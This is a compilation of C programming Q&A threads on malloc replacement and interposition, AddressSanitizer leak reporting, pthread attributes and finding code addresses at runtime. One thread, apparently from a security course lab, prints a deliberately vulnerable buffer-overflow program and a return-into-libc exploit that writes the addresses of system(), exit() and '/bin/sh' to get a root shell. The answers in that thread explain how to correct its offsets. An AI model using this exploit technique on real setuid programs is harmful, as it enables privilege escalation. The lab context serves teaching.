Why does replacing malloc cause a segmentation fault (__GI__IO_file_overflow)? - c

I tried to mimic the way jemalloc replaces ptmalloc by replacing malloc myself, and the replacement immediately resulted in a segmentation fault.
code1.c:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
void *ptr = malloc(10);
printf("%p\n", ptr);
return EXIT_SUCCESS;
}
code2.c:
#include <stdlib.h>
#include <stdint.h>
void *malloc(size_t size)
{
return (void *)10;
}
Compile instructions
gcc -c code2.c
ar r libcode2.a code2.o
gcc code1.c -L. -lcode2 -g
gdb
Breakpoint 1, main (argc=1, argv=0x7fffffffe318) at code1.c
17 void *ptr = malloc(10);
(gdb) s
18 printf("%p\n", ptr);
(gdb) p ptr
$1 = (void *) 0xa
(gdb) n
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7e46658 in __GI__IO_file_overflow () from /lib64/libc.so.6

If you replace malloc with a non-functional variant, you had better not call any libc functions that may use malloc in their implementation.
Here you called printf, which itself uses malloc internally (glibc allocates the stdout buffer with malloc on first use, which is consistent with the crash inside __GI__IO_file_overflow). Use GDB's where command to see where the crash happened.
I am actually surprised your program made it as far as main(); I expected it to crash much earlier, since thousands of instructions are executed long before main is reached.
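To make the point concrete: a replacement allocator has to return memory the caller can really write to, because libc itself will use it. The following is a minimal sketch of such an allocator, a bump allocator over a static array. The name arena_alloc and the 64 KiB ARENA_SIZE are assumptions made for illustration, not part of the question's code; the sketch never reuses memory and is not thread-safe.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define ARENA_SIZE (64 * 1024)  /* hypothetical capacity, chosen for the example */

/* Backing storage, aligned for any object type. */
static _Alignas(max_align_t) unsigned char arena[ARENA_SIZE];
static size_t arena_used = 0;

/* Hypothetical bump allocator: hands out consecutive, suitably aligned
 * chunks of the static arena and returns NULL when the arena is exhausted. */
void *arena_alloc(size_t size)
{
    const size_t align = _Alignof(max_align_t);
    assert((align & (align - 1)) == 0);   /* rounding below needs a power of two */

    if (size == 0)
        size = 1;                         /* give zero-size requests a distinct address */
    if (size > ARENA_SIZE)
        return NULL;                      /* also keeps the rounding from overflowing */

    size_t rounded = (size + align - 1) & ~(align - 1);
    if (rounded > ARENA_SIZE - arena_used)
        return NULL;

    void *p = arena + arena_used;
    arena_used += rounded;
    return p;
}
```

Exposing this logic under the name malloc would let printf obtain a usable buffer instead of the address 0xa. Note that the glibc manual asks a replacement to provide at least malloc, free, calloc and realloc together, so a real replacement needs more than this one function.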

Related

Library interpositioning

I have been trying to intercept calls to malloc and free, following our textbook (CSAPP book).
I have followed their exact code, and nearly the same code that I found online and I keep getting a segmentation fault. I heard our professor saying something about printf that mallocs and frees memory so I think that this happens because I am intercepting a malloc and since I am using a printf function inside the intercepting function, it will call itself recursively.
However, I can't seem to find a solution to this problem. Our professor demonstrated that intercepting works (he didn't show us the code) and prints information every time a malloc occurs, so I know that it's possible.
Can anyone suggest a working method?
Here is the code that I used and get nothing:
mymalloc.c
#ifdef RUNTIME
// Run-time interposition of malloc and free based on
// dynamic linker's (ld-linux.so) LD_PRELOAD mechanism
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
void *malloc(size_t size) {
    static void *(*mallocp)(size_t size) = NULL;
    char *error;
    void *ptr;
    // get address of libc malloc
    if (!mallocp) {
        mallocp = dlsym(RTLD_NEXT, "malloc");
        if ((error = dlerror()) != NULL) {
            fputs(error, stderr);
            exit(EXIT_FAILURE);
        }
    }
    ptr = mallocp(size);
    printf("malloc(%d) = %p\n", (int)size, ptr);
    return ptr;
}
#endif
test.c
#include <stdio.h>
#include <stdlib.h>
int main(){
printf("main\n");
int* a = malloc(sizeof(int)*5);
a[0] = 1;
printf("end\n");
}
The result I'm getting:
$ gcc -o test test.c
$ gcc -DRUNTIME -shared -fPIC mymalloc.c -o mymalloc.so
$ LD_PRELOAD=./mymalloc.so ./test
Segmentation Fault
This is the code that I tried and got segmentation fault (from https://gist.github.com/iamben/4124829):
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
void* malloc(size_t size)
{
static void* (*rmalloc)(size_t) = NULL;
void* p = NULL;
// resolve next malloc
if(!rmalloc) rmalloc = dlsym(RTLD_NEXT, "malloc");
// do actual malloc
p = rmalloc(size);
// show statistic
fprintf(stderr, "[MEM | malloc] Allocated: %lu bytes\n", size);
return p;
}
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define STR_LEN 128
int main(int argc, const char *argv[])
{
char *c;
char *str1 = "Hello ";
char *str2 = "World";
//allocate an empty string
c = malloc(STR_LEN * sizeof(char));
c[0] = 0x0;
//and concatenate str{1,2}
strcat(c, str1);
strcat(c, str2);
printf("New str: %s\n", c);
return 0;
}
The makefile from the git repo didn't work so I manually compiled the files and got:
$ gcc -shared -fPIC libint.c -o libint.so
$ gcc -o str str.c
$ LD_PRELOAD=./libint.so ./str
Segmentation fault
I have been doing this for hours and I still get the same incorrect result, despite the fact that I copied textbook code. I would really appreciate any help!!
One way to deal with this is to turn off the printf when your routine is called recursively:
static char ACallIsInProgress = 0;
if (!ACallIsInProgress)
{
ACallIsInProgress = 1;
printf("malloc(%d) = %p\n", (int)size, ptr);
ACallIsInProgress = 0;
}
return ptr;
With this, if printf calls malloc, your routine will merely call the actual malloc (via mallocp) and return without causing another printf. You will miss printing information about a call to malloc that the printf does, but that is generally tolerable when interposing is being used to study the general program, not the C library.
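If you need to support multithreading, some additional work is needed: a single static flag is shared by all threads, so it would have to be made per-thread (for example, with thread-local storage).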
The printf implementation might allocate a buffer only once, the first time it is used. In that case, you can initialize a flag that turns off the printf similar to the above, call printf once in the main routine (maybe be sure it includes a nice formatting task that causes printf to allocate a buffer, not a plain string), and then set the flag to turn on the printf call and leave it set for the rest of the program.
Another option is for your malloc routine not to use printf at all but to cache data in a buffer to be written later by some other routine or to write raw data to a file using write, with that data interpreted and formatted by a separate program later. Or the raw data could be written by a pipe to a program that formats and prints it and that is not using your interposed malloc.
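The last option, writing with write instead of printf, can be sketched as follows. The helper name log_alloc and the output format are assumptions for illustration; the idea is only that the line is built in a stack buffer and sent with write(2), so nothing on this path calls malloc.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>

/* Append v, written in base 10 or 16, to buf starting at pos.
 * Returns the position just past the last digit. */
static size_t put_number(char *buf, size_t pos, uintptr_t v, unsigned base)
{
    char tmp[32];                        /* enough for a 64-bit value in base 10 */
    size_t n = 0;

    assert(base == 10 || base == 16);    /* debug-only precondition */
    do {
        tmp[n++] = "0123456789abcdef"[v % base];
        v /= base;
    } while (v != 0);
    while (n > 0)
        buf[pos++] = tmp[--n];           /* digits were produced in reverse */
    return pos;
}

/* Hypothetical helper: writes "malloc(SIZE) = 0xADDR\n" to fd using only a
 * stack buffer and write(2). Returns what write() returns. */
ssize_t log_alloc(int fd, size_t size, const void *ptr)
{
    char line[96];
    size_t pos = 0;

    memcpy(line + pos, "malloc(", 7);
    pos += 7;
    pos = put_number(line, pos, (uintptr_t)size, 10);
    memcpy(line + pos, ") = 0x", 6);
    pos += 6;
    pos = put_number(line, pos, (uintptr_t)ptr, 16);
    line[pos++] = '\n';
    return write(fd, line, pos);
}
```

Inside the interposed malloc, a call such as log_alloc(STDERR_FILENO, size, ptr) would take the place of the printf line.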

How to get the output of AddressSanitizer when sending SIGINT to halt a loop

When I compile this simple test program, I get the expected leak report from AddressSanitizer, but when I compile the same program with an infinite loop and interrupt it by sending SIGINT, I don't get any output.
Checking the asm output, the malloc is not optimized away (if that is possible at all).
Is this the expected behavior of AddressSanitizer? I don't encounter this problem in other projects.
Working example:
#include <stdlib.h>
int main(void)
{
char *a = malloc(1024);
return 1;
}
Not working (kill with SIGINT):
#include <stdlib.h>
int main(void)
{
char *a = malloc(1024);
for(;;);
return 1;
}
compile: gcc test.c -o test -fsanitize=address
I encounter this problem in a full program, but I reduced it to this minimal example.
I tried many ways, with exit() and abort() calls; this works:
#include <stdlib.h>
#include <signal.h>
#include <stdio.h>
#include <setjmp.h>
jmp_buf jmpbuf;
void handler (int signum) {
printf("handler %d \n", signum);
// we jump from here to main()
// and then call return
longjmp(jmpbuf, 1);
}
int main(int argc, char *argv[])
{
if (setjmp(jmpbuf)) {
// we are in signal context here
return 2;
}
signal(SIGINT, handler);
signal(SIGTERM, handler);
char *a = malloc(1024);
while (argc - 1);
return 1;
}
Results in:
> gcc file.c -fsanitize=address && timeout 1 ./a.out arg
handler 15
=================================================================
==12970==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 1024 byte(s) in 1 object(s) allocated from:
#0 0x7f4798c9bd99 in __interceptor_malloc /build/gcc/src/gcc/libsanitizer/asan/asan_malloc_linux.cc:86
#1 0x5569e64e0acd in main (/tmp/a.out+0xacd)
#2 0x7f479881206a in __libc_start_main (/usr/lib/libc.so.6+0x2306a)
SUMMARY: AddressSanitizer: 1024 byte(s) leaked in 1 allocation(s).
I guess that the AddressSanitizer functions are executed after main returns.
The code responsible for printing that error output is called as a destructor (fini) procedure. Since your program terminates without calling any of the process destructors (due to the SIGINT), you do not get any error printouts.
__lsan_do_leak_check() can help you avoid using longjmp in @KamilCuk's answer:
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <sanitizer/lsan_interface.h>
void handler (int signum) {
__lsan_do_leak_check();
}
int main(int argc, char *argv[])
{
signal(SIGINT, handler);
char *a = malloc(1024);
a=0;
printf("lost pointer\n");
for(;;);
return 1;
}
Demo:
clang test.c -fsanitize=address -fno-omit-frame-pointer -g -O0 -o test && ./test
lost pointer
C-c C-c
=================================================================
==29365==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 1024 byte(s) in 1 object(s) allocated from:
#0 0x4c9ca3 in malloc (/home/bjacob/test+0x4c9ca3)
#1 0x4f9187 in main /home/bjacob/test.c:13:14
#2 0x7fbc9898409a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2409a)
SUMMARY: AddressSanitizer: 1024 byte(s) leaked in 1 allocation(s).
Note I added a=0 to create a leak.
I also added a printf. Without that printf, the leak error is not printed. I suspect the compiler optimized-out the use of the variable "a" despite my using the -O0 compiler option.

Return-into-libc Attack

This is a two part question:
a) I am working on a return-into-libc attack and am not getting a root shell for some reason. I am supposed to exploit a vulnerable program, retlib.c:
/* retlib.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(FILE *badfile)
{
char buffer[12];
/* The following statement has a buffer overflow problem */
fread(buffer, sizeof(char), 128, badfile);
return 1;
}
int main(int argc, char **argv)
{
FILE *badfile;
badfile = fopen("badfile", "r");
bof(badfile);
printf("Returned Properly\n");
fclose(badfile);
return 1;
}
I am using my exploit: exploit_1.c
/* exploit_1.c */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char buf[40];
FILE *badfile;
badfile = fopen("./badfile", "w");
*(long *) &buf[24] = 0xbffffe86; // "/bin/sh"
*(long *) &buf[16] = 0x40076430; // system()
*(long *) &buf[20] = 0x40069fb0; // exit()
fwrite(buf, 40, 1, badfile);
fclose(badfile);
}
I found the addresses of system and exit using gdb:
(gdb) b main
Breakpoint 1 at 0x80484b7
(gdb) r
Starting program: /home/cs4393/project2/exploit_1
Breakpoint 1, 0x080484b7 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40076430 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0x40069fb0 <exit>
(gdb)
I found the /bin/sh address using the myshell.c program:
//myshell.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void main (){
char* shell = getenv("MYSHELL");
if(shell)
printf("%x\n", (unsigned int) shell);
}
Then, using the commands:
[02/15/2015 21:46] cs4393@ubuntu:~/project2$ export MYSHELL=/bin/sh
[02/15/2015 21:46] cs4393@ubuntu:~/project2$ ./myshell
bffffe86
I feel like I have done everything right, but I keep getting a "Segmentation fault (core dumped)". I am using no -fstack-protector, chmod 4755 and ASLR turned off. Any thoughts on what is wrong?
b) I am also working with retlib-env.c:
/*retlib-env.c*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(FILE *badfile)
{
char buffer[12];
/* The following statement has a buffer overflow problem */
fread(buffer, sizeof(char), 128, badfile);
return 1;
}
int main(int argc, char **argv)
{
FILE *badfile;
char* shell=getenv("MYSHELL");
if(shell)
printf("%x\n", (unsigned int)shell);
badfile = fopen("badfile", "r");
//system(shell);
bof(badfile);
printf("Returned Properly\n");
fclose(badfile);
return 1;
}
This seems to me to be similar to part a, but "In this example, the vulnerable program retlib-env.c will reference MYSHELL environment." I don't know what I need to add to my exploit to make it work. Any hints or nudges in the right direction would be really helpful. I have MYSHELL, but I'm not really sure how I need to reference it to exploit retlib-env.c. Shouldn't it be pretty similar to part a?
The addresses of functions such as system() and exit() probably change at every program invocation. You cannot rely on loading the program, finding these addresses in the debugger, closing the debug session, and running the program again, because the program may be loaded at a completely different starting address the second time.
$gdb -q retlib
You need to find the addresses of system and exit in retlib, not in exploit. The exploit program only prepares the exploit file; retlib reads that file and overflows its buffer. As far as I know, the system address should be placed 12 bytes past the end of the 12-byte buffer, which means at buf[24].
The length of the program's name influences the addresses of the environment variables on the stack. To get the correct address of the string /bin/sh, the name of the program used to look up /bin/sh (i.e. myshell) should have the same length as the name of the program you finally attack (i.e. retlib).
Besides, you need to find the offset of the saved return address, which is 4 plus the distance between &buffer and ebp in bof. That is supposed to be 20 + 4 = 24, rather than the 16 used in your code. You can verify it with gdb on the program compiled with the -g flag.
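The offset arithmetic from the answers can be written out as a small helper. This is only a sketch: the struct and function names are hypothetical, and the distance of 20 bytes between &buffer and ebp is the figure quoted above, which depends on the compiler and must be confirmed in gdb.

```c
#include <assert.h>
#include <stddef.h>

/* Byte offsets, measured from the start of the overflowed buffer, of the
 * three words a classic 32-bit return-into-libc payload overwrites. */
struct retlib_layout {
    size_t system_addr;  /* overwrites the saved return address of bof */
    size_t exit_addr;    /* becomes the return address seen by system() */
    size_t arg_addr;     /* becomes the first argument of system() */
};

/* buf_to_ebp: distance from &buffer to the saved ebp (20 per the answer above).
 * word: size of a stack word, 4 on 32-bit x86. */
struct retlib_layout retlib_offsets(size_t buf_to_ebp, size_t word)
{
    struct retlib_layout l;

    assert(word > 0);
    l.system_addr = buf_to_ebp + word;     /* skip over the saved ebp */
    l.exit_addr   = l.system_addr + word;
    l.arg_addr    = l.exit_addr + word;
    return l;
}
```

For retlib_offsets(20, 4) this gives 24, 28 and 32, whereas the exploit in the question used 16, 20 and 24.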

Using pthreads and malloc

I asked a question, Using sockets in multithread server, yesterday. In that question I described a segmentation fault under Solaris in a multithreaded server. Now I have found the core of the error and written code that briefly demonstrates it:
#include <stdlib.h>
#include <pthread.h>
int main(int argc, char *argv[])
{
pthread_attr_t *attr;
attr = (pthread_attr_t *)malloc(sizeof(pthread_attr_t));
pthread_attr_setdetachstate(attr, PTHREAD_CREATE_DETACHED);
malloc(0);
malloc(0); //Segmentation fault there
return 0;
}
Second malloc crashes with Segmentation fault.
While this code executes normally:
#include <stdlib.h>
#include <pthread.h>
int main(int argc, char *argv[])
{
pthread_attr_t *attr;
attr = (pthread_attr_t *)malloc(sizeof(pthread_attr_t));
// pthread_attr_setdetachstate(attr, PTHREAD_CREATE_DETACHED);
malloc(0);
malloc(0);
return 0;
}
Could you please explain the reason for the error?
P.S.: I compile with gcc -pthreads -lpthread -D_REENTRANT keys.
From the docs on pthread_attr_setdetachstate():
The behavior is undefined if the value specified by the attr argument to pthread_attr_getdetachstate() or pthread_attr_setdetachstate() does not refer to an initialized thread attributes object.
It's possible that the pthread_attr_t object the attr argument points to contains a pointer to some state maintained by the pthreads library. If it hasn't been initialized, that pointer would be garbage so the pthread_attr_setdetachstate() call might corrupt the heap.
See the pthread_attr_init() function to see how to properly initialize the attributes object.
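A minimal sketch of the initialization order, assuming a hypothetical helper named make_detached_attr: the attributes object is initialized with pthread_attr_init() before the detach state is set, and the caller destroys it when done.

```c
#include <assert.h>
#include <pthread.h>
#include <stddef.h>

/* Hypothetical helper: initialize *attr and mark it detached.
 * Returns 0 on success or the error number from the failing pthread call.
 * On success the caller must eventually call pthread_attr_destroy(attr). */
int make_detached_attr(pthread_attr_t *attr)
{
    int rc;

    assert(attr != NULL);
    rc = pthread_attr_init(attr);        /* must come before any setter */
    if (rc != 0)
        return rc;

    rc = pthread_attr_setdetachstate(attr, PTHREAD_CREATE_DETACHED);
    if (rc != 0)
        pthread_attr_destroy(attr);      /* do not leave a half-built object behind */
    return rc;
}
```

The attributes object does not need to come from malloc; a local pthread_attr_t passed by address works, and the same object can then be handed to pthread_create().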

Find program's code address at runtime?

When I use gdb to debug a program written in C, the disassemble command shows the instructions and their addresses in the code segment. Is it possible to know those memory addresses at runtime? I am using Ubuntu. Thank you.
[edit] To be more specific, I will demonstrate it with following example.
#include <stdio.h>
int main(int argc,char *argv[]){
myfunction();
exit(0);
}
Now I would like to get the address of myfunction() in the code segment when I run my program.
Above answer is vastly overcomplicated. If the function reference is static, as it is above, the address is simply the value of the symbol name in pointer context:
void* myfunction_address = myfunction;
If you are grabbing the function dynamically out of a shared library, then the value returned from dlsym() (POSIX) or GetProcAddress() (windows) is likewise the address of the function.
Note that the above code is likely to generate a warning with some compilers, as ISO C technically forbids assignment between code and data pointers (some architectures put them in physically distinct address spaces).
And some pedants will point out that the address returned isn't really guaranteed to be the memory address of the function, it's just a unique value that can be compared for equality with other function pointers and acts, when called, to transfer control to the function whose pointer it holds. Obviously all known compilers implement this with a branch target address.
And finally, note that the "address" of a function is a little ambiguous. If the function was loaded dynamically or is an extern reference to an exported symbol, what you really get is generally a pointer to some fixup code in the "PLT" (a Unix/ELF term, though the PE/COFF mechanism on windows is similar) that then jumps to the function.
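As a small illustration of the points above, the sketch below converts a function pointer to an integer instead of to void *, which sidesteps the code/data pointer warning. The result of that conversion is implementation-defined, and the names code_address and format_code_address are hypothetical; myfunction is given an empty body only so the example is complete.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

typedef void (*func_ptr)(void);

/* Stand-in for the function from the question. */
void myfunction(void)
{
}

/* Convert a function pointer to an integer. The value is
 * implementation-defined; on mainstream platforms it is the branch target. */
uintptr_t code_address(func_ptr fn)
{
    return (uintptr_t)fn;
}

/* Format the address as hexadecimal text (for example "0x401136") into out.
 * Returns what snprintf() returns. */
int format_code_address(char *out, size_t cap, func_ptr fn)
{
    assert(out != NULL && cap > 0);
    return snprintf(out, cap, "%#jx", (uintmax_t)code_address(fn));
}
```

The printed value can be compared with what gdb's disassemble shows for the same run; with address space randomization it may differ between runs.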
If you know the function name before program runs, simply use
void * addr = myfunction;
If the function name is given at run-time, I once wrote a function to find the symbol address dynamically using the bfd library. Here is the x86_64 code; you can get the address via find_symbol("a.out", "myfunction") in the example.
#include <bfd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Returns the value of symbol symname in file filename, or -1 on failure. */
long find_symbol(char *filename, char *symname)
{
    bfd *ibfd;
    asymbol **symtab;
    long nsize, nsyms, i;
    long result = -1;
    symbol_info syminfo;
    char **matching;
    bfd_init();
    ibfd = bfd_openr(filename, NULL);
    if (ibfd == NULL) {
        printf("bfd_openr error\n");
        return -1;
    }
    if (!bfd_check_format_matches(ibfd, bfd_object, &matching)) {
        printf("format_matches\n");
        bfd_close(ibfd);
        return -1;
    }
    /* Size in bytes needed to hold the symbol pointers; not positive on error. */
    nsize = bfd_get_symtab_upper_bound(ibfd);
    if (nsize <= 0 || (symtab = malloc(nsize)) == NULL) {
        printf("cannot read symbol table\n");
        bfd_close(ibfd);
        return -1;
    }
    nsyms = bfd_canonicalize_symtab(ibfd, symtab);
    for (i = 0; i < nsyms; i++) {
        if (strcmp(symtab[i]->name, symname) == 0) {
            bfd_symbol_info(symtab[i], &syminfo);
            result = (long) syminfo.value;
            break;
        }
    }
    if (i >= nsyms)
        printf("cannot find symbol\n");
    /* Release resources on every path, including when the symbol was found. */
    free(symtab);
    bfd_close(ibfd);
    return result;
}
To get a backtrace, use execinfo.h as documented in the GNU libc manual.
For example:
#include <execinfo.h>
#include <stdio.h>
#include <unistd.h>
void trace_pom()
{
const int sz = 15;
void *buf[sz];
// get at most sz entries
int n = backtrace(buf, sz);
// output them right to stderr
backtrace_symbols_fd(buf, n, fileno(stderr));
// but if you want to output the strings yourself
// you may use char ** backtrace_symbols (void *const *buffer, int size)
write(fileno(stderr), "\n", 1);
}
void TransferFunds(int n);
void DepositMoney(int n)
{
if (n <= 0)
trace_pom();
else TransferFunds(n-1);
}
void TransferFunds(int n)
{
DepositMoney(n);
}
int main()
{
DepositMoney(3);
return 0;
}
Compiled with:
gcc a.c -o a -g -Wall -Werror -rdynamic
According to the mentioned website:
Currently, the function name and offset can only be obtained on systems that use the ELF
binary format for programs and libraries. On other systems, only the hexadecimal return
address will be present. Also, you may need to pass additional flags to the linker to
make the function names available to the program. (For example, on systems using GNU
ld, you must pass -rdynamic.)
Output
./a(trace_pom+0xc9)[0x80487fd]
./a(DepositMoney+0x11)[0x8048862]
./a(TransferFunds+0x11)[0x8048885]
./a(DepositMoney+0x21)[0x8048872]
./a(TransferFunds+0x11)[0x8048885]
./a(DepositMoney+0x21)[0x8048872]
./a(TransferFunds+0x11)[0x8048885]
./a(DepositMoney+0x21)[0x8048872]
./a(main+0x1d)[0x80488a4]
/lib/i686/cmov/libc.so.6(__libc_start_main+0xe5)[0xb7e16775]
./a[0x80486a1]
About a comment in an answer (getting the address of an instruction), you can use this very ugly trick
#include <setjmp.h>
void function() {
printf("in function\n");
printf("%d\n",__LINE__);
printf("exiting function\n");
}
int main() {
jmp_buf env;
int i;
printf("in main\n");
printf("%d\n",__LINE__);
printf("calling function\n");
setjmp(env);
for (i=0; i < 18; ++i) {
printf("%p\n",env[i]);
}
function();
printf("in main again\n");
printf("%d\n",__LINE__);
}
It should be env[12] (the eip), but be careful as it looks machine dependent, so triple check my word. This is the output
in main
13
calling function
0xbfff037f
0x0
0x1f80
0x1dcb
0x4
0x8fe2f50c
0x0
0x0
0xbffff2a8
0xbffff240
0x1f
0x292
0x1e09
0x17
0x8fe0001f
0x1f
0x0
0x37
in function
4
exiting function
in main again
37
have fun!
